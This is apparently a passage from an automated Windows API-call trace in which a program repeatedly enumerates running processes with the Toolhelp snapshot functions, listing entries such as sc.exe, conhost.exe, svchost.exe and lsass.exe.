Process32NextW (in: hSnapshot=0x198, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xe04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xb14, pcPriClassBase=8, dwFlags=0x0, szExeFile="sc.exe")) returned 1 [0065.072] wcslen (_String="sc.exe") returned 0x6 [0065.072] Process32NextW (in: hSnapshot=0x198, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xe0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xb14, pcPriClassBase=8, dwFlags=0x0, szExeFile="sc.exe")) returned 1 [0065.073] wcslen (_String="sc.exe") returned 0x6 [0065.073] Process32NextW (in: hSnapshot=0x198, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xe14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xb14, pcPriClassBase=8, dwFlags=0x0, szExeFile="sc.exe")) returned 1 [0065.074] wcslen (_String="sc.exe") returned 0x6 [0065.074] Process32NextW (in: hSnapshot=0x198, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xe1c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xb14, pcPriClassBase=8, dwFlags=0x0, szExeFile="sc.exe")) returned 1 [0065.075] wcslen (_String="sc.exe") returned 0x6 [0065.075] Process32NextW (in: hSnapshot=0x198, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xe24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xb14, pcPriClassBase=8, dwFlags=0x0, szExeFile="sc.exe")) returned 1 [0065.076] wcslen (_String="sc.exe") returned 0x6 [0065.076] Process32NextW (in: hSnapshot=0x198, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xe2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xb14, pcPriClassBase=8, dwFlags=0x0, szExeFile="sc.exe")) returned 1 [0065.077] wcslen (_String="sc.exe") returned 0x6 [0065.077] Process32NextW (in: hSnapshot=0x198, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xe34, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xb14, pcPriClassBase=8, dwFlags=0x0, szExeFile="sc.exe")) returned 1 [0065.077] wcslen (_String="sc.exe") returned 0x6 [0065.077] Process32NextW (in: hSnapshot=0x198, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xe3c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xb14, pcPriClassBase=8, dwFlags=0x0, szExeFile="sc.exe")) returned 1 [0065.078] wcslen (_String="sc.exe") returned 0x6 [0065.078] Process32NextW (in: hSnapshot=0x198, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xe44, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xb14, pcPriClassBase=8, dwFlags=0x0, szExeFile="sc.exe")) returned 1 [0065.079] wcslen (_String="sc.exe") returned 0x6 [0065.079] Process32NextW (in: hSnapshot=0x198, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xe58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0065.080] wcslen (_String="conhost.exe") returned 0xb [0065.080] Process32NextW (in: hSnapshot=0x198, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xe60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0xcfc, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0065.081] wcslen (_String="conhost.exe") returned 0xb [0065.081] Process32NextW (in: hSnapshot=0x198, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xe68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xd04, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0065.082] wcslen (_String="conhost.exe") returned 0xb [0065.082] Process32NextW (in: hSnapshot=0x198, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xe70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0xd0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0065.082] wcslen (_String="conhost.exe") returned 0xb [0065.082] Process32NextW (in: hSnapshot=0x198, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xe78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0xd14, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0065.083] wcslen (_String="conhost.exe") returned 0xb [0065.083] Process32NextW (in: hSnapshot=0x198, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xe80, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0xd1c, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0065.084] wcslen (_String="conhost.exe") returned 0xb [0065.084] Process32NextW (in: hSnapshot=0x198, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xe88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0xd24, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0065.085] wcslen (_String="conhost.exe") returned 0xb [0065.085] Process32NextW (in: hSnapshot=0x198, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xe90, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0xd2c, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0065.086] wcslen (_String="conhost.exe") returned 0xb [0065.086] Process32NextW (in: hSnapshot=0x198, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xe98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0xd34, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0065.087] wcslen (_String="conhost.exe") returned 0xb [0065.087] Process32NextW (in: hSnapshot=0x198, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xea0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xd3c, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0065.088] wcslen (_String="conhost.exe") returned 0xb [0065.088] Process32NextW (in: hSnapshot=0x198, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xea8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0xd44, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0065.088] wcslen (_String="conhost.exe") returned 0xb [0065.088] Process32NextW (in: hSnapshot=0x198, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xeb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0xd4c, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0065.089] wcslen (_String="conhost.exe") returned 0xb [0065.089] Process32NextW (in: hSnapshot=0x198, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xeb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0xd54, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0065.090] wcslen (_String="conhost.exe") returned 0xb [0065.090] Process32NextW (in: hSnapshot=0x198, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xec0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xd5c, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0065.091] wcslen (_String="conhost.exe") returned 0xb [0065.091] Process32NextW (in: hSnapshot=0x198, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xec8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xd64, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0065.091] wcslen (_String="conhost.exe") returned 0xb [0065.091] Process32NextW (in: hSnapshot=0x198, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xed0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0xd6c, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0065.092] wcslen (_String="conhost.exe") returned 0xb [0065.092] Process32NextW (in: hSnapshot=0x198, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xed8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xd74, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0065.093] wcslen (_String="conhost.exe") returned 0xb [0065.093] Process32NextW (in: hSnapshot=0x198, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xee0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0xd7c, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0065.094] wcslen (_String="conhost.exe") returned 0xb [0065.094] Process32NextW (in: hSnapshot=0x198, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xee8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0xd84, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0065.095] wcslen (_String="conhost.exe") returned 0xb [0065.095] Process32NextW (in: hSnapshot=0x198, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xef0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0xd8c, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0065.095] wcslen (_String="conhost.exe") returned 0xb [0065.095] Process32NextW (in: hSnapshot=0x198, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xef8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0xd94, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0065.096] wcslen (_String="conhost.exe") returned 0xb [0065.096] Process32NextW (in: hSnapshot=0x198, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0xd9c, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0065.097] wcslen (_String="conhost.exe") returned 0xb [0065.097] Process32NextW (in: hSnapshot=0x198, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xf08, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0xda4, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0065.098] wcslen (_String="conhost.exe") returned 0xb [0065.098] Process32NextW (in: hSnapshot=0x198, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xf10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0xdac, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0065.099] wcslen (_String="conhost.exe") returned 0xb [0065.099] Process32NextW (in: hSnapshot=0x198, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xf18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0xdb4, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0065.099] wcslen (_String="conhost.exe") returned 0xb [0065.099] Process32NextW (in: hSnapshot=0x198, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xf20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0xdbc, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0065.180] wcslen (_String="conhost.exe") returned 0xb [0065.180] Process32NextW (in: hSnapshot=0x198, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xf28, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0xdc4, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0065.181] wcslen (_String="conhost.exe") returned 0xb [0065.181] Process32NextW (in: hSnapshot=0x198, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xf30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xdcc, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0065.182] wcslen (_String="conhost.exe") returned 0xb [0065.182] Process32NextW (in: hSnapshot=0x198, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xf38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0xdd4, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0065.183] wcslen (_String="conhost.exe") returned 0xb [0065.183] Process32NextW (in: hSnapshot=0x198, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xf40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0xddc, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0065.184] wcslen (_String="conhost.exe") returned 0xb [0065.184] Process32NextW (in: hSnapshot=0x198, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xf48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0xde4, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0065.185] wcslen (_String="conhost.exe") returned 0xb [0065.185] Process32NextW (in: hSnapshot=0x198, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xf50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0xdec, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0065.186] wcslen (_String="conhost.exe") returned 0xb [0065.186] Process32NextW (in: hSnapshot=0x198, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xf58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0xdf4, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0065.186] wcslen (_String="conhost.exe") returned 0xb [0065.187] Process32NextW (in: hSnapshot=0x198, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xf60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0xdfc, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0065.187] wcslen (_String="conhost.exe") returned 0xb [0065.187] Process32NextW (in: hSnapshot=0x198, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xf68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0xe04, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0065.188] wcslen (_String="conhost.exe") returned 0xb [0065.188] Process32NextW (in: hSnapshot=0x198, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xf70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0xe0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0065.189] wcslen (_String="conhost.exe") returned 0xb [0065.189] Process32NextW (in: hSnapshot=0x198, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xf78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0xe14, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0065.190] wcslen (_String="conhost.exe") returned 0xb [0065.190] Process32NextW (in: hSnapshot=0x198, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xf80, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0xe1c, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0065.191] wcslen (_String="conhost.exe") returned 0xb [0065.191] Process32NextW (in: hSnapshot=0x198, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xf88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0xe24, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0065.192] wcslen (_String="conhost.exe") returned 0xb [0065.192] Process32NextW (in: hSnapshot=0x198, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xf90, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0xe2c, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0065.192] wcslen (_String="conhost.exe") returned 0xb [0065.192] Process32NextW (in: hSnapshot=0x198, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xf98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xe34, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0065.193] wcslen (_String="conhost.exe") returned 0xb [0065.193] Process32NextW (in: hSnapshot=0x198, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xfa0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0xe3c, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0065.194] wcslen (_String="conhost.exe") returned 0xb [0065.194] Process32NextW (in: hSnapshot=0x198, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xfa8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0xe44, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0065.195] wcslen (_String="conhost.exe") returned 0xb [0065.195] Process32NextW (in: hSnapshot=0x198, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xfa8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0xe44, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 0 [0065.195] CloseHandle (hObject=0x198) returned 1 [0065.195] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0x17c [0065.205] Process32FirstW (in: hSnapshot=0x17c, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0065.206] wcslen (_String="[System Process]") returned 0x10 [0065.206] Process32NextW (in: hSnapshot=0x17c, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x64, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0065.206] wcslen (_String="System") returned 0x6 [0065.206] Process32NextW (in: hSnapshot=0x17c, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x108, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0065.207] wcslen (_String="smss.exe") returned 0x8 [0065.207] Process32NextW (in: hSnapshot=0x17c, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x150, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x148, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0065.208] wcslen (_String="csrss.exe") returned 0x9 [0065.208] Process32NextW (in: hSnapshot=0x17c, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x194, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x148, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0065.209] wcslen (_String="wininit.exe") returned 0xb [0065.209] Process32NextW (in: hSnapshot=0x17c, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x19c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x18c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0065.210] wcslen (_String="csrss.exe") returned 0x9 [0065.210] Process32NextW (in: hSnapshot=0x17c, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x18c, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0065.211] wcslen (_String="winlogon.exe") returned 0xc [0065.211] Process32NextW (in: hSnapshot=0x17c, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x1e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x194, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0065.211] wcslen (_String="services.exe") returned 0xc [0065.211] Process32NextW (in: hSnapshot=0x17c, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x1ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x194, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0065.212] wcslen (_String="lsass.exe") returned 0x9 [0065.212] Process32NextW (in: hSnapshot=0x17c, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x248, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1e4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0065.213] wcslen (_String="svchost.exe") returned 0xb [0065.213] Process32NextW (in: hSnapshot=0x17c, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x268, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1e4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0065.214] wcslen (_String="svchost.exe") returned 0xb [0065.214] Process32NextW (in: hSnapshot=0x17c, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0065.215] wcslen (_String="dwm.exe") returned 0x7 [0065.215] Process32NextW (in: hSnapshot=0x17c, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1e4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0065.216] wcslen (_String="svchost.exe") returned 0xb [0065.216] Process32NextW (in: hSnapshot=0x17c, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x348, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1e4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0065.283] wcslen (_String="svchost.exe") returned 0xb [0065.283] Process32NextW (in: hSnapshot=0x17c, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1e4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0065.284] wcslen (_String="svchost.exe") returned 0xb [0065.284] Process32NextW (in: hSnapshot=0x17c, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3a, th32ParentProcessID=0x1e4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0065.285] wcslen (_String="svchost.exe") returned 0xb [0065.285] Process32NextW (in: hSnapshot=0x17c, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x384, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1e4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0065.285] wcslen (_String="svchost.exe") returned 0xb [0065.285] Process32NextW (in: 